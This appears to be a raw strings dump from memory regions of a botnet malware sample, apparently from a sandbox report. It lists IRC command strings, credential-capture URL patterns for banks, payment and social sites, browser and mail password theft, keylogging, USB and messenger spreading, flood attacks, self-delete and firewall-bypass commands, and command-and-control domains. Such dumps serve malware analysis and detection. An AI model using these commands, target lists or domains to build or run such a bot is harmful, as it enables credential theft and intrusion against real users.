JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
a.baerr000.ru
a.baerr000.ru
a.joerv06.com
a.joerv06.com
a.tsroxybaa.com
a.tsroxybaa.com
fbi.gov
fbi.gov
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
\\.\pipe\312a36d2
\\.\pipe\312a36d2
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
C:\Windows
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
7 767
8*808;8~8
8*808;8~8
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
/C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
/C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
c:\%original file name%.exe
c:\%original file name%.exe
twunk_16.exe_3204_rwx_002A0000_00021000:
.text
`.rdata
@.data
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
MSVCRT.dll
_acmdln
SHLWAPI.dll
PSAPI.DLL
CRYPT32.dll
`0%x"
[8FTp}
.QzQD
M .TI
.Jg%4
H.nH_
]`rDo%c
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
\kernel32.dll
%s %s
explorer.exe
twunk_16.exe_3204_rwx_00400000_00022000:
.text
`.rdata
@.data
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
MSVCRT.dll
_acmdln
SHLWAPI.dll
PSAPI.DLL
CRYPT32.dll
`0%x"
[8FTp}
.QzQD
M .TI
.Jg%4
H.nH_
]`rDo%c
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
\kernel32.dll
%s %s
explorer.exe
twunk_16.exe_3204_rwx_00560000_00051000:
0U'%u
3'.tN
: %s;q
^.BL(
.UHi)
SQLnnZj
lTzsQLt
twunk_16.exe_3392_rwx_00170000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
a.baerr000.ru
a.joerv06.com
a.tsroxybaa.com
fbi.gov
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
\\.\pipe\312a36d2
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
8*808;8~8
%s\Microsoft\%s.exe
\\.\pipe
Internet Explorer\iexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\Desktop.ini
winlogon.exe
mspaint.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
^C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe
c:\%original file name%.exe
twunk_16.exe_3392_rwx_00400000_00049000:
.text
`.rdata
@.data
.reloc
ASSSSSShD$ PASSf%s:ZKTDJRBHOEUDX
GET %s HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/%i.0 (Windows NT %i.%i; %srv:%i.0) Gecko/20100101 Firefox/%i.0
Mozilla/%i.0 (compatible; MSIE %i.0; Windows NT %i.%i; Trident/%i.0)
_wv=%s
network.http.spdy.enabled.v3-1
network.http.spdy.enabled
network.http.spdy.enabled.http2
PTF://%s:%s@%s:%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
HttpSendRequestW
RegOpenKeyExW
RegCloseKey
%s\%ls\dmps\log.txt
%s\%ls\dmps\%slog.txt
%slogs.cab
%s\Thunderbird\profiles.ini
%s\Thunderbird\%s
Thunderbird.Url.news\DefaultIcon
Type - Mail | Name - %s | User - %s | Password - %s
&HTTPMail User Name
HTTPMail Password2
POP3 Password2
pstorec.dll
%s%c%c\logins.json
%snss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
encryptedPassword":
hXXps://
-----------------------------%d
Content-Disposition: form-data; name="data"; filename="%S"
POST %s HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-Type: multipart/form-data; boundary=---------------------------%d
Content-Length: %d
RegOpenKeyA
RegOpenKeyExA
GetProcessHeap
KERNEL32.dll
GetKeyNameTextW
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardState
GetKeyState
MapVirtualKeyW
USER32.dll
GDI32.dll
RegDeleteKeyW
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCRT.dll
_acmdln
ntdll.dll
WININET.dll
CRYPT32.dll
SHLWAPI.dll
WS2_32.dll
GdiplusShutdown
gdiplus.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Content-type: application/x-www-form-urlencoded
netsh firewall add allowedprogram "%s" %s ENABLE
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s"
cabinet.dll
chrome.dll
Ws2_32.dll
%ls\screenshot.jpg
\settings3.bin
\settings.rdp
ws2_32.dll
wininet.dll
f/s %s
xul.dll
nss3.dll
nspr4.dll
Wininet.dll
okernel32.dll
Win Srv 2008
Win Srv 2003
Win Srv
Win XP
d.d.d
[ %s | Time - d:d (d.d.%d) ]
%S\%i.jpg
dAccount65.stg
Accounts70.tdat
Account71.rec0
Account.rec0
\kernel32.dll
%s %s
PGdiPlus.dll
schannel.dll
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
filezilla.exe
ftprush.exe
winscp.exe
corePTF.exe
freePTF.exe
far.exe
ftpte.exe
smartPTF.exe
flashfxp.exe
totalcmd.exe
csrss.exe_368_rwx_02080000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
